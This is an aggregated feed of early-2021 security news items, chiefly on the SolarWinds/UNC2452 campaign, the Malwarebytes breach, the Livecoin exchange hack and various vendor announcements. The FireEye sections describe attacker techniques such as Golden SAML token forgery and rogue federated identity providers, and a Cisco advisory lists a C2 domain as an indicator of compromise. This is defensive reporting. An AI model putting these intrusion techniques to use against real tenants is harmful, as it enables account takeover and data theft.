Livecoin halted operations after the December attack

The Russian cryptocurrency exchange Livecoin has announced it is terminating its operation following the December cyberattack. 

The Russian cryptocurrency exchange was hacked on Christmas Eve, it published a message on its website warning customers to stop using its services.

“Dear clients, we ask you to stop using our service in all meanings: don’t deposit funds, don’t trade, don’t use API. We are under a carefully planned attack, which has been prepared, as we assume, over the last few months. We lost control of all of our servers, backend and nodes. Thus, we were not able to stop our service in time.” reads the message published on the website. “Our news channels were compromised as well. At the moment, we partially control frontend, and so we’re able to place this announcement. We’re fighting hard to get back our servers, nodes and funds, we’re working 24/7. News and next update will come up in the next few days. We’re working in contact with local police authorities. We really do our best to overcome this issue.”

livecoin

Livecoin recommended users to stop depositing funds and making transactions, it also notified local law enforcement.

The administrators of the platforms informed its customers to have lost control of some of its servers, the attack was not opportunistic, it appears to be well planned.

The attack took place nighttime, between December 23 and December 24, the attackers modified exchange rates to absurd values (15 times their ordinary values). The Bitcoin exchange rate was set to over $450,000/BTC, while the value of ETH was increased from $600/ETH up to $15,000

Once pumped out the exchange rates, the attackers began cashing out accounts, making huge profits.

Now, Livecoin announced it is terminating its activity following the December cyberattack. 

“Dear clients, as we reported earlier, our service were under attack in December 2020. Investigation is in active phase right now. Our service has been damaged hard in technical and financial way. There is no way to continue operative business in these conditions, so we take a hard decision to close the business and paying the remaining funds to clients.” reads the announcement published by the exchange.

“Our clients have to contact us via email verification@livecoin.news to get payments after passing verification procedure. We accept claims for payments for the next 2 months. 17 March 2021 is the last day of accepting your requests, after this date no new requests will be accepted.”

The company announced that it will accept claims for payments until 17 March 2021.

CoinTelegraph reported that some users have refused to send their personal data to Livecoin fearing for their security and privacy. A user revealed that Livecoin is requesting documents and data that could be used by ill-intentioned to conduct scams ad frauds, including passport scans, residence information, high-resolution selfies, and data about the first transaction on the exchange.

“We apologize for an existing situation and ask you to keep calm, including your conversation with support officers. Our service and team bear hard losses as well as our clients. In case of abuse and threats in conversation, the claim can be declined.” Livecoin added.

“We have to warn you about tons of fake groups in different messengers and other channels, where people represent themselves as our team members, insiders, hackers etc. Participating in these groups you run a high risk, because we have no any groups. The only official statements are made on this website. Do not send money to anyone. You don’t have to pay to get back your funds from us, the only thing you need is to send a request and follow simple procedure.”

At the time of this writing, Livecoin’s old website domain displays the message “Oops! Time is over Livecoin….”.

As usual, some users speculate that this could be an Exit Scam.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Livecoin)

The post Livecoin halted operations after the December attack appeared first on Security Affairs.

FireEye releases an auditing tool to detect SolarWinds hackers’ activity

Cybersecurity firm FireEye has released a report that sheds the light on the SolarWinds attack and the way hackers breached its networks.

Cybersecurity firm FireEye has released a report that sheds the light on the SolarWinds attack and the way hackers breached its networks.

The experts explained how the UNC2452 and other threat actors breached the infrastructure and moved laterally from on-premises networks to the Microsoft 365 cloud. The paper, titled Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452 also provides tips for organizations on how proactively harden their environments.

FireEye also released a tool named Azure AD Investigator that could be used by organizations to discover if their organization has been breached by the SolarWinds hackers, tracked by the security firm as UNC2452.

This FireEye GitHub repository contains a PowerShell module that can be used to detect artifacts associated with the UNC2452’s intrusion and other threat actor activity.

“Some indicators are “high-fidelity” indicators of compromise, while other artifacts are so called “dual-use” artifacts.” states FireEye. “Dual-use artifacts may be related to threat actor activity, but also may be related to legitimate functionality. Analysis and verification will be required for these.”

FireEye pointed out that the tool is read-only, which means that it does not make any changes to the Microsoft 365 environment.

The company warns that the tool could not identify a compromise 100% of the time, and is not able to distinguish if an artifact is the result of a legitimate admin activity or threat actor activity.

Mandiant researchers explained that UNC2452 and other threat actors primarily used four techniques for lateral movements:

  1. Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  2. Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  3. Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  4. Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

The Cybersecurity and Infrastructure Security Agency (CISA)’s Cloud Forensics team has also released a PowerShell-based tool, dubbed Sparrow, that can that helps administrators to detect anomalies and potentially malicious activities in Azure/Microsoft 365 environments.

CrowdStrike experts also decided to create their own tool because they face difficulties in using Azure’s administrative tools to enumerate privileges assigned to third-party resellers and partners in their Azure tenant.

“CrowdStrike launches CrowdStrike Reporting Tool for Azure (CRT), a free community tool that will help organizations quickly and easily review excessive permissions in their Azure AD environments, help determine configuration weaknesses, and provide advice to mitigate risk.” states the security firm.

“Throughout our analysis, we experienced first hand the difficulties customers face in managing Azure’s administrative tools to know what relationships and permissions exist within Azure tenants, particularly with third-party partner/resellers, and how to quickly enumerate them. We found it particularly challenging that many of the steps required to investigate are not documented, there was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible.”

The CrowdStrike Reporting Tool for Azure (CRT) tool could be used by administrators to analyze their Microsoft Azure environment and review the privileges assigned to third-party resellers and partners.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds APT)

The post FireEye releases an auditing tool to detect SolarWinds hackers’ activity appeared first on Security Affairs.

Retail and Hospitality Facing Deluge of Critical Web App Flaws

Retail and Hospitality Facing Deluge of Critical Web App Flaws

More than three-quarters of applications in the retail and hospitality sector contain at least one vulnerability, with a high percentage of these requiring urgent attention, according to Veracode.

The application security vendor analyzed more than 130,000 applications to compile its latest State of Software Security report.

However, while the 76% of buggy apps in the retail and hospitality sector is about average compared to other verticals, Veracode warned that 26% are high severity — one of the worst rates of any industry.

This matters, as the industry has been delivering a raft of new applications in order to reach customers online during the pandemic, amid social distancing and lockdowns. It’s especially important to hospitality firms, which have been forced to radically reshape their business models to adapt to the new reality.

Yet while web applications can be a life-saver for such businesses, they might also introduce extra cyber-risk. They were involved in 43% of breaches analyzed by Verizon last year and were the number one attack vector for the retail industry, with personal or payment data exploited in about half of all breaches.

That said, retail and hospitality ranked second-best for overall fix rate, according to Veracode. Half of its flaws were remediated in 125 days, which is nearly one month faster than the next-fastest sector.

Veracode claimed that, although retail and hospitality firms did well at addressing common flaw types like information leakage and input validation, developers struggled with encapsulation, SQL injection and credentials management issues.

“Retail and hospitality companies face the dual pressure of being high-value targets for attackers while also requiring software that allows them to be highly responsive to customers and compliant with industry regulations such as PCI,” said Chris Eng, Veracode chief research officer.

“Using API-driven scanning and software composition analysis to scan for flaws in open source components offer the best opportunity for improvement for development teams in the sector.”

Sophisticated Watering Hole Attack

Google’s Project Zero has exposed a sophisticated watering-hole attack targeting both Windows and Android:

Some of the exploits were zero-days, meaning they targeted vulnerabilities that at the time were unknown to Google, Microsoft, and most outside researchers (both companies have since patched the security flaws). The hackers delivered the exploits through watering-hole attacks, which compromise sites frequented by the targets of interest and lace the sites with code that installs malware on visitors’ devices. The boobytrapped sites made use of two exploit servers, one for Windows users and the other for users of Android

The use of zero-days and complex infrastructure isn’t in itself a sign of sophistication, but it does show above-average skill by a professional team of hackers. Combined with the robustness of the attack code — ­which chained together multiple exploits in an efficient manner — the campaign demonstrates it was carried out by a “highly sophisticated actor.”

[…]

The modularity of the payloads, the interchangeable exploit chains, and the logging, targeting, and maturity of the operation also set the campaign apart, the researcher said.

No attribution was made, but the list of countries likely to be behind this isn’t very large. If you were to ask me to guess based on available information, I would guess it was the US — specifically, the NSA. It shows a care and precision that it’s known for. But I have no actual evidence for that guess.

All the vulnerabilities were fixed by last April.

Cyber Security Today – Why good passwords aren’t enough, COVID vaccine documents altered in hack, and intimate photos found unprotected.

Today's podcast reports on the hack of a software firm's forum administrator account, COVID vaccine documents altered in a hack intimate photos from a discontinued app found unprotected and a warning about dating apps

The post Cyber Security Today – Why good passwords aren’t enough, COVID vaccine documents altered in hack, and intimate photos found unprotected. first appeared on IT World Canada.

Malwarebytes: SolarWinds Hackers Read Our Emails

Malwarebytes: SolarWinds Hackers Read Our Emails

Malwarebytes has confirmed that the SolarWinds attackers managed to access internal emails, although via a different intrusion vector to many victims.

While many of the organizations caught up in the suspected Russian cyber-espionage campaign were compromised via a malicious SolarWinds Orion update, US government agency CISA had previously pointed to a second threat vector. This involved use of password guessing or spraying and/or exploiting inappropriately secured admin or service credentials.

The security vendor said attackers abused applications with privileged access to Microsoft Office 365 and Azure environments.

“We received information from the Microsoft Security Response Center on December 15 about suspicious activity from a third-party application in our Microsoft Office 365 tenant consistent with the tactics, techniques and procedures (TTPs) of the same advanced threat actor involved in the SolarWinds attacks,” the vendor explained.

“The investigation indicates the attackers leveraged a dormant email protection product within our Office 365 tenant that allowed access to a limited subset of internal company emails. We do not use Azure cloud services in our production environments.”

Malwarebytes clarified that it found no evidence of unauthorized access or compromise in any of its on-premises or production environments.

The news comes as FireEye released a new report detailing the various ways the SolarWinds attackers moved laterally to the Microsoft 365 cloud after gaining an initial foothold in networks.

They include: stealing an Active Directory Federation Services (AD FS) token-signing certificate and using it to forge tokens for arbitrary users, compromising credentials of highly privileged on-premises accounts synced to Microsoft 365 and modifying/adding trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls.

The attackers also backdoored existing Microsoft 365 apps by adding a new application or service principal credential. This enabled them to use the legitimate permissions assigned to the application, such as reading emails, FireEye said.

The security vendor has joined CrowdStrike and CISA in releasing a new tool which will help organizations spot if their Microsoft 365 tenants have been subject to the same techniques used by the group.

Malwarebytes was breached by the SolarWinds attackers

A fourth malware strain wielded by the SolarWinds attackers has been detailed by Symantec researchers, followed by the disclosure of the attackers’ ingenous lateral movement techniques and the release of an auditing script by FireEye researchers that organizations can use to check their Microsoft 365 tenants for signs of intrusion. Then, on Tuesday, Malwarebytes CEO Marcin Kleczynski disclosed that the same attackers targeted and breached the company, but not through the compromised SolarWinds Orion platform … More

The post Malwarebytes was breached by the SolarWinds attackers appeared first on Help Net Security.

Google Details Patched Bugs in Signal, FB Messenger, JioChat Apps

In January 2019, a critical flaw was reported in Apple's FaceTime group chats feature that made it possible for users to initiate a FaceTime video call and eavesdrop on targets by adding their own number as a third person in a group chat even before the person on the other end accepted the incoming call. The vulnerability was deemed so severe that the iPhone maker removed the FaceTime group

How to Report Email Fraud: Learn What to Do If It Happens to You

Have you, a colleague or a friend ever received a suspicious email? It is of paramount importance to know how to report email fraud in order to avoid all the unpleasant consequences that might come from it, especially if we’re talking about the compromise of your business email – revenue loss, data breach, reputation damage, […]

The post How to Report Email Fraud: Learn What to Do If It Happens to You appeared first on Heimdal Security Blog.

Quarter of Orgs Don’t Offer Cybersecurity Training Due to Lack of Budget

Quarter of Orgs Don’t Offer Cybersecurity Training Due to Lack of Budget

A quarter (25%) of company directors are prevented from delivering cybersecurity training to staff by budgetary constraints, according to iomart’s Cybersecurity Insights Report.

The survey of UK-based workers across C-level, director, manager and employee level, found that 28% of businesses offer no cybersecurity training whatsoever. Additionally, 42% said that whilst some training was offered by their firm, it was only available to select staff, while over two-thirds (70%) of respondents revealed their company doesn’t provide training to all employees.

Of those that confirmed they did receive training, 82% admitted this only consisted of a short briefing rather than a comprehensive course, with just 17% receiving regular sessions related to cybersecurity.

iomart therefore calculated that less than one in 10 (8%) of those who took part in the survey received regular cybersecurity training.

The study also found that a quarter (25%) of businesses do not have a disaster recovery policy, while a further 31% said there was one but they had never tested it.

These findings are especially concerning given that 20% of respondents reported they had seen an increase in cyber-attacks as a result of remote working, which has expanded enormously since the start of the COVID-19 pandemic.

Although company directors cited budget as the main factor in not delivering cybersecurity training, other factors highlighted by all respondents were a lack of technical expertise within the business (8%) and the issue not being a main priority (5%).

Bill Strain, security director of iomart, commented: “It’s clear that many organizations still don’t consider cybersecurity and data protection to be a top priority.

“They need to understand what the potential threats are and build resilience into their business strategy so they can react quickly and maintain operations if their IT systems are compromised.

“Many businesses would not survive the operational – let alone financial – impact of a data breach. By understanding the potential risk and introducing positive behavior around cyber-awareness, they have a much better chance of surviving an incident.”

In a survey at the end of last year, a third of remote working employees said they had not received security training in the last six months.

Hashtag Trending – Parler survives; FBI investigates looks into stolen laptop from Capitol assault; Empty Toronto office

Parler is partially running again with the help of a Russian tech firm, the FBI looks into a stolen laptop from the Capitol assault, and office vacancies in downtown Toronto are on a rise.

The post Hashtag Trending – Parler survives; FBI investigates looks into stolen laptop from Capitol assault; Empty Toronto office first appeared on IT World Canada.

Coin-Mining Malware Volumes Soar 53% in Q4 2020

Coin-Mining Malware Volumes Soar 53% in Q4 2020

Detections of crypto-mining malware surged by 53% quarter-on-quarter in the final three months of 2020 as the value of Bitcoin soared, according to Avira.

The price of one Bitcoin now stands at over $35,500, close to an all-time-high it hit earlier this month, according to the security vendor’s Avira Protection Labs.

"The rapid increase in coin-miner malware suggests that malware authors are taking advantage of the price trend in recent months and increasingly spreading malware that aims to exploit other people’s computer resources for illegal mining activities,” argued Alexander Vukcevic, director of Avira Protection Labs.

“This correlation is not surprising but is nevertheless worrying for legitimate miners and investors.”

Crypto-mining or crypto-jacking came of age in 2017 and 2018 as cyber-criminals sought a quick and easy way to monetize attacks. It was claimed at the time that because attacks didn’t require user interaction to start generating profits for the perpetrator, many would-be ransomware groups were pivoting to the new threat.

Avira listed three main types of coin-mining malware today: executable files, browser-based cryptocurrency miners and advanced fileless miners.

It was the browser-based Coinhive that drove the previous spike in cryptocurrency-mining activity. By February 2018 it had impacted 23% of global organizations, according to one study. One researcher even found it installed on UK and US government sites including those belonging to the UK’s Information Commissioner’s Office (ICO), United States Courts, the General Medical Council, the UK’s Student Loans Company and NHS Inform.

Coinhive shut down in February 2019, but the practice appears to be spiking again alongside the value of digital currency.

Chris Sedgwick, security operations director, Sy4Security, argued that it is the lesser-known Monero currency rather than Bitcoin that’s in high demand.

“The reason why the majority of cryptocurrency malware mines Monero instead of Bitcoin is that the mining requirements for Monero is a fraction of that required for Bitcoin,” he said.

“Monero is also favored over Bitcoin amongst those individuals looking to use their gains for illegal use as there is no tracking of transactions and the Blockchain is not transparent.”

How your staff make security decisions: The psychology of information security

Your employees encounter potential cyber security threats on a daily basis. Perhaps there’s a new face in the office that they don’t recognise, or a new password they need to remember, or a database of sensitive information that they need to upload onto the Cloud.

In The Psychology of Information Security, Leron Zinatullin explains how employees respond to those challenges and explains why they make the decisions they do.

For example, he found that employees usually don’t have a solid understanding of information security or their obligations to protect information.

In the rare cases where employees are aware of and follow a security policy, they don’t appreciate why those rules are in place.


The cost of compliance is too high

The majority of employees within an organisation are hired to execute specific jobs, such as marketing, managing projects, and manufacturing goods.

Therefore, an employee’s main priority is often to ensure efficient completion of their core business activity, and information security will usually only be a secondary activity.

Zinatullin found that, when security mechanisms cause additional workload, employees will favour non-compliant behaviour in order to complete their primary tasks quickly.

The means of compliance are obstructive

Sometimes, employees are unable to comply even if they are willing because the security mechanisms of the organisation do not match their basic requirements.

Examples include an organisation giving employees encrypted USB drives with too little storage space, forcing them to share files via email or non-encrypted drives.

Another problem is having to use multiple passwords to access multiple systems. Users normally resolve this problem by writing down their passwords.

Want to know more?

The information in this blog was taken from Leron Zinatullin’s The Psychology of Information Security.

Use this book to understand your employee’s behaviour and resolve security-related conflicts.

It contains insights gained from academic research, as well as interviews with UK-based security professionals from various sectors, and will help you develop a security programme that accounts for human weaknesses and your wider business objectives.


A version of this blog was originally published on 6 February 2017.

The post How your staff make security decisions: The psychology of information security appeared first on IT Governance UK Blog.

Does your cloud stack move faster than your cloud security solutions?

According to Gartner, worldwide end-user spending on public cloud services is forecasted to grow by 18.4% in 2021 to a total of $304.9 billion, up from $257.5 billion in 2020. “The pandemic validated the cloud’s value proposition,” said Sid Nag, research vice president at Gartner. “The ability to use on-demand, scalable cloud models to achieve cost efficiency and business continuity is providing the impetus for organizations to rapidly accelerate their digital business transformation plans.” From … More

The post Does your cloud stack move faster than your cloud security solutions? appeared first on Help Net Security.

Protecting the remote workforce to be enterprises’ prime focus in 2021

Protecting the remote workforce will be enterprises’ prime focus in 2021, according to a Cato Networks survey of 2,376 IT leaders. IT teams struggled in the early days of the pandemic, rushing to meet the urgent need for widespread remote access. Connecting users often came at the expense of other factors, such as security, performance, and management. As 81% of respondents expect to continue working-from-home (WFH), 2021 will see enterprises address those other areas, evolving … More

The post Protecting the remote workforce to be enterprises’ prime focus in 2021 appeared first on Help Net Security.

Anti-Virus

Make sure you have anti-virus software installed on your computer and that it is automatically updating. However, keep in mind that no anti-virus can catch all malware; your computer can still be infected. That is why it's so important you use common sense and be wary of any messages that seem odd or suspicious.

SolarWinds Hackers Also Breached Malwarebytes Cybersecurity Firm

Malwarebytes on Tuesday said it was breached by the same group who broke into SolarWinds to access some of its internal emails, making it the fourth major cybersecurity vendor to be targeted after FireEye, Microsoft, and CrowdStrike. The company said its intrusion was not the result of a SolarWinds compromise, but rather due to a separate initial access vector that works by "abusing applications

Companies turning to MSPs as attack vectors get more sophisticated

Research from Infrascale reveals new information security insights important to MSPs in the new year. The research survey highlights business executive input, from a security perspective, on COVID-19, on cloud adoption, and on standards compliance. As 65% of those surveyed have seen an increase in information security breaches in their industry since the pandemic began, it’s not surprising that even more, 74% of all respondents, have chosen caution and implemented new infosec technology. A robust … More

The post Companies turning to MSPs as attack vectors get more sophisticated appeared first on Help Net Security.

Improving Your Security Posture with the Pipeline Cybersecurity Initiative

A few years ago, I worked alongside some oil commodity traders. Environmental concerns aside, I never realized how many parts were required to get the oil out of the ground, not to mention everything else that finally resulted in the production of refined products that surround our lives. As a cybersecurity professional, I was more interested […]… Read More

The post Improving Your Security Posture with the Pipeline Cybersecurity Initiative appeared first on The State of Security.

Data Classification Is Data Storage

‘Business’ is a verb that practically means the movement of data. If you aren’t sharing data – keeping the books, sharing ideas and stats about sales, getting the correct information regarding the customer or data to the customer – then you aren’t doing much business. But organizations need to protect their data along the way. […]… Read More

The post Data Classification Is Data Storage appeared first on The State of Security.

Research team develops fast and affordable quantum random number generator

An international research team has developed a fast and affordable quantum random number generator. The device created by scientists from NUST MISIS, Russian Quantum Center, University of Oxford, Goldsmiths, University of London and Freie Universität Berlin produces randomness at a rate of 8.05 gigabits per second, which makes it the fastest random number generator of its kind. The study is a promising starting point for the development of commercial random number generators for cryptography and … More

The post Research team develops fast and affordable quantum random number generator appeared first on Help Net Security.

DataLocker releases encrypted USB drive with capacities up to 15.3 TB

DataLocker announced the release of an entirely new breed of encrypted USB drive. The DL4 FE changes the game for security professionals by providing bulletproof security and simple remote management in a small-form-factor USB drive with capacities up to 15.3 TB. “The onslaught of attacks by state actors, hackers, and cyber cartels continues. Threat actors are trying to exfiltrate terabytes of data to hold for ransom. Some want access to essential IT systems for later … More

The post DataLocker releases encrypted USB drive with capacities up to 15.3 TB appeared first on Help Net Security.

Cyber Observer enhances its platform with unified visibility of security tool effectiveness

Cyber Observer announced a major enhancement to its platform that enables CISOs and other security and risk management executives to obtain new, continuous, unified visibility into the effectiveness of cybersecurity tools that are implemented throughout their enterprise. By continuously retrieving and analyzing Critical Security Controls (CSCs) from applications on-premises and in-cloud, Cyber Observer’s CCM platform simplifies compliance, reduces mean time to detection and response, and advances risk posture management. Cybersecurity teams are overwhelmed with complexity … More

The post Cyber Observer enhances its platform with unified visibility of security tool effectiveness appeared first on Help Net Security.

Rancher’s platform for managed Kubernetes now available through BoxBoat’s MAS contract with the GSA

BoxBoat announced that Rancher Federal’s enterprise platform for managed Kubernetes is now available through BoxBoat’s Multiple Award Schedule contract with the General Services Administration (GSA). This expansion of BoxBoat’s relationship with Rancher Federal will enable government agencies to take greater advantage of Rancher’s support for certified Kubernetes distribution, either on-premise or in the public cloud. As agencies adopt Kubernetes and DevSecOps, Rancher provides audited and US-validated distributions of critical open-source products necessary to deliver cutting-edge … More

The post Rancher’s platform for managed Kubernetes now available through BoxBoat’s MAS contract with the GSA appeared first on Help Net Security.

Netskope NewEdge network now expanded to a new data center in Singapore

Netskope announced the expansion of the Netskope NewEdge network to a new data center in Singapore. Serving millions of enterprise users around the world, Netskope NewEdge is a carrier-grade private cloud network that is reserved exclusively for Netskope customers. The expansion of the Singapore data center enhances the NewEdge infrastructure, building on Netskope’s investment in the region to better serve local and multinational customers. Trustwave, a Singtel company and the global security arm of Singtel, … More

The post Netskope NewEdge network now expanded to a new data center in Singapore appeared first on Help Net Security.

McAfee partners with ECS to offer MDR capabilities through MVISION EDR

McAfee announced that it is partnering with ECS to offer managed threat detection and response (MDR) capabilities through McAfee MVISION EDR. ECS is the first North American MDR partner for McAfee MVISION EDR and will leverage MVISION EDR and supporting vendors to deliver a scalable, repeatable and customizable program that enables organizations to focus on only verified threats. MDR solutions can help organizations by alleviating the customer challenges associated with alert fatigue, false positives, inexperienced … More

The post McAfee partners with ECS to offer MDR capabilities through MVISION EDR appeared first on Help Net Security.

uCloudlink signs agreement with CVITC to develop smart container solutions powered by Cloud SIM

uCloudlink has inked a Strategic Cooperation Framework Agreement with China Vehicle Interconnected Transport Capacity Technology (“CVITC”). The partnership will see both companies develop innovative smart container solutions for domestic and international freight markets powered by uCloudlink’s core patented Cloud SIM technology which accelerates the development of the global container transportation industry. The advent of container shipping has dramatically improved cargo transportation efficiency around the world. Despite this, this shipping method is often hazardous, and there … More

The post uCloudlink signs agreement with CVITC to develop smart container solutions powered by Cloud SIM appeared first on Help Net Security.

Tanium collaborates with OpenCTI to help orgs increase their threat detection capabilities

Tanium has announced a collaboration with OpenCTI, an open source platform which specialises in the analysis of cyber threats. The collaboration will allow the integration of Tanium’s behavior-based detection offering, Tanium Signals, with OpenCTI, helping organizations to store, organize and visualise intelligence information in real-time. The Tanium-OpenCTI connector is now ready for production use and available to all Tanium customers. The ability to collect and analyse Cyber Threat Intelligence (CTI) is critical, as cyber teams … More

The post Tanium collaborates with OpenCTI to help orgs increase their threat detection capabilities appeared first on Help Net Security.

Swimlane raises $40M to accelerate partnerships and alliances, expand research and development

Swimlane announced it has raised $40 million in funding led by EIP. This funding will accelerate partnerships and alliances, expand research and development, and enable further global expansion. Additionally, Swimlane has appointed James Brear as Chief Executive Officer, who was previously CEO of Veriflow, which was sold to VMWare in August 2019. Industry visionary and Senior Operating Partner at EIP, Niloofar Howe, has also been named as the company’s newest board member. “Without a doubt, … More

The post Swimlane raises $40M to accelerate partnerships and alliances, expand research and development appeared first on Help Net Security.

Impartner appoints Robert Reid to its board of directors

Impartner announced it has appointed Robert Reid to the company’s board of directors. Reid is chairman of Mid-Market Solutions for Sage, the market leader in cloud business management solutions. Prior to Sage, Reid was CEO of Intaact (which was acquired by Sage), LucidEra, UpShot and Seeker Software. A respected thought leader in the software-as-a-service (SaaS) industry, Reid has won multiple CEO leadership awards, including Best CEO in the Financials Industry, CEO of the year for … More

The post Impartner appoints Robert Reid to its board of directors appeared first on Help Net Security.

Malwarebytes ‘s email systems hacked by SolarWinds attackers

Cyber security firm Malwarebytes announced that threat actor behind the SolarWinds attack also breached its network last year.

Malwarebytes revealed today that SolarWinds hackers also breached its systems and gained access to its email. Malwarebytes joins the club of security firms that were hit by Solarwinds attackers, after FireEye, Microsoft, and CrowdStrike.

The intrusion took place last year, the company pointed out that hackers exploited another attack vector and did use SolarWinds Orion software.

The intruders compromised some internal systems by exploiting a weakness in Azure Active Directory and abused malicious Office 365 applications.

“While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor. We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments.” reads the post published by malwarebytes. “After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails. We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.”

On December 15, Microsoft Security Response Center warned the security firm of suspicious activity from a third-party application in its Microsoft Office 365 tenant. The activity was consistent with the tactics, techniques, and procedures (TTPs) of the SolarWinds attackers.

Malwarebytes said it learned of the intrusion from the Microsoft Security Response Center (MSRC) on December 15.

With the support of Microsoft’s Detection and Response Team (DART), Malwarebytes discovered that the attackers leveraged a dormant email protection product within our Office 365 tenant that allowed access to a limited subset of internal company emails. The security firms explained that it does not use Azure cloud services in its production environments.

Malwarebytes performed a deep investigation through its infrastructure, inspecting its source code, build and delivery processes, but it confirmed that internal systems showed no evidence of unauthorized access or compromise. This means that the customers of the security firm were not impacted using its anti-malware solution.

“While we have learned a lot of information in a relatively short period of time, there is much more yet to be discovered about this long and active campaign that has impacted so many high-profile targets,” concludes the company.

“It is imperative that security companies continue to share information that can help the greater industry in times like these, particularly with such new and complex attacks often associated with nation state actors.”

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

The post Malwarebytes ‘s email systems hacked by SolarWinds attackers appeared first on Security Affairs.

The SolarWinds Orion Breach, and What You Should Know

By Joe Marshall of Cisco Talos and Paul Smith of Cisco IoT

What is this?

On December 11th, 2020, the U.S. government and the company SolarWinds disclosed a breach into their SolarWinds Orion Platform network management software. This attack was conducted by a sophisticated and likely nation-state based attacker. SolarWinds Orion is a commonly used network management software stack used to manage complex switched and routed IT/OT architectures.

High profile customers of the Orion platform are numerous U.S. government agencies, and many private entities. The adversary was able to penetrate SolarWinds software development infrastructure, and bolt malware into a legitimate software update from SolarWinds for their Orion platform. In March of 2020, this malicious ‘patch’ was distributed, which then could provide backdoor access into the victim’s networks where the adversary could then exfiltrate data.

Due to the enormity of this attack, forensic and threat intelligence information is still rapidly changing. For Cisco Secure and IoT customers, our security coverage and updates can be found at the Cisco Talos blog post here. At the time of this posting, SolarWinds customer exposure is stated to be less than 18,000 of the 30,000 Orion platform customers.

What do you do about it?

Per an advisory published by the Cybersecurity & Infrastructure Security Agency, or CISA, potential victims should identify which victim category they fall into based on the whether or not they installed the following binaries and contacted the command and control (C2) server: avsvmcloud[.]com

  • Orion Platform 2019.4 HF5, version 2019.4.5200.9083
  • Orion Platform 2020.2 RC1, version 2020.2.100.12219
  • Orion Platform 2020.2 RC2, version 2020.2.5200.12394
  • Orion Platform 2020.2, 2020.2 HF1, version 2020.2.5300.12432

To determine a level of concern, CISA has also given these categories to help you understand risks and perform incident response as necessary.

  • Category 1: includes those who do not have the identified malicious binary. These owners can patch their systems and resume use as determined by and consistent with their internal risk evaluations.
  • Category 2: includes those who have identified the presence of the malicious binary—with or without beaconing to avsvmcloud[.]com. Owners with infected appliances communicating with avsvmcloud[.]com but not with a secondary C2—a fact that can be verified by comprehensive network monitoring for the device—can harden the device, re-install the updated software from a verified software supply chain, and resume use as determined by and consistent with a thorough risk evaluation.
  • Category 3: includes those with the binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address. If you observed communications with avsvmcloud[.]com that appear to suddenly cease prior to December 14, 2020— not due to an action taken by your network defenders—you fall into this category. Assume the environment has been compromised, and initiate incident response procedures immediately.

What does this mean?

The SolarWinds Orion compromise is an incredibly impactful attack across numerous industrial verticals, especially electric subsectors concerned with critical infrastructure. This will perhaps be regarded in the same category as NotPetya, or ccleaner as another successful nation-state supply chain attack with vast ramifications. As this is a recently discovered attack both in breadth and scope, we will be unpacking the damage done and discovering new forensic details for a considerable amount of time. Now is as a good a time as any to consider your operating risks and cyber threats to your business continuity.

As potentially damaging as the SolarWinds compromise could be, it could also be a catalyst for positive change for your enterprise. We would encourage you to think about your converged IT/OT architectures – what exposures and risks do you have not just from something like the SolarWinds compromise, but with any enterprise products that straddle both information and operational technology enterprises. Could you identify all the risks and exposures you have? From fundamental asset identification and network mappings and data flows, to unpatched vulnerabilities and process identification, there is a lot to consider.

It is also important to note that the attack on the SolarWinds Orion platform can absolutely cause an unwanted disruption in an operational network. Due to the pervasive nature of this platform, its tendrils can extend very far into the spine of an operational technology environment. From assigning IP’s and port security, to active directory integrations, to patch management and networking monitoring, SolarWinds Orion can run very deep into networks. This is largely undesirable for security reasons, but many enterprises may view it as necessary evil to maintain a large and complex infrastructure.

Furthermore, due to the nature of how products like SolarWinds Orion manage the infrastructure, it requires stored credentials/keys to be put in place to leverage the ease of use. This has long been the dilemma faced in IT/OT infrastructure, fewer people managing larger scale networks utilizing the convivence of ‘single pane of glass’ tools. These create security holes, and it is really up to the enterprise to weigh the risk vs. reward.

Conclusion

Long gone are the halcyon days of only external cyber risks to your enterprise. As organizations outsource all or parts of their IT and make heavier use of cloud services, their cybersecurity relies even more on those of their suppliers. We now live in an era of nation-state compromised supply chains that could impact your enterprise in profound ways. Given the considerable burden of managing your enterprises security, and now contending with nation-state supply chain attacks, it can likely feel overwhelming as a defender. Our suggestion: start at the basics and work forward. Ask yourselves what’s the worst day you could have and plan your risks accordingly.

Consider strategies like operating your industrial infrastructure in a zero trust model that can help mitigate damage done, not just against the SolarWinds compromise, but against ransomware or other malware attacks. Consider how well you know your networks, and if you know what there is to protect. Think about security monitoring and protections in your OT environments. Consider emergency response playbooks for cyber incident response. Consider safety concerns if an attack impacts your operations, or your regulatory compliance.

Ultimately, these are all difficult questions with complex answers, but the resilience and safety of your organization are worth the journey. Here is how Cisco can help:

Cisco Cyber Vision has been specifically developed for OT and IT teams to work together to ensure continuity, security, resilience and safety of your industrial operations. Cyber Vision has behavioral analysis and Snort® intrusion detection capabilities to detect malicious traffic. The latest Cyber Vision knowledge base includes Cisco Talos IDS signatures to detect SolarWinds attacks. If you have not done so already, we recommend you install it today by downloading it here.

